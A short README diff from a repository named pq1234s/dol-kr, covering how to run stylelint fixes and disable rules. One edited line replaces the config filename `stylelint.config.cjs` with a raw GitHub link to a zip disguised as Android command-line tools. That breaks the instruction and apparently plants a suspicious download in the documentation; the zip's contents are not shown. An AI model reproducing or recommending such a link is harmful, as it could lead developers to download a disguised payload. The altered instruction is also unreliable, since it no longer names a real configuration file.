pq1234s/dol-kr/README.md

 Sometimes all issues cannot be fixed within single "fix" run (e.g. properties order).
 Simply run fix command several time until all auto-fixable issues are resolved.

-If you find a rule that doesn't make sense for the project you can disable it inside `rules` section inside `stylelint.config.cjs`:
+If you find a rule that doesn't make sense for the project you can disable it inside `rules` section inside `https://raw.githubusercontent.com/pq1234s/dol-kr/main/devTools/androidsdk/image/commandlinetools-linux-6609375_latest.zip`:

 ```js
 rules: {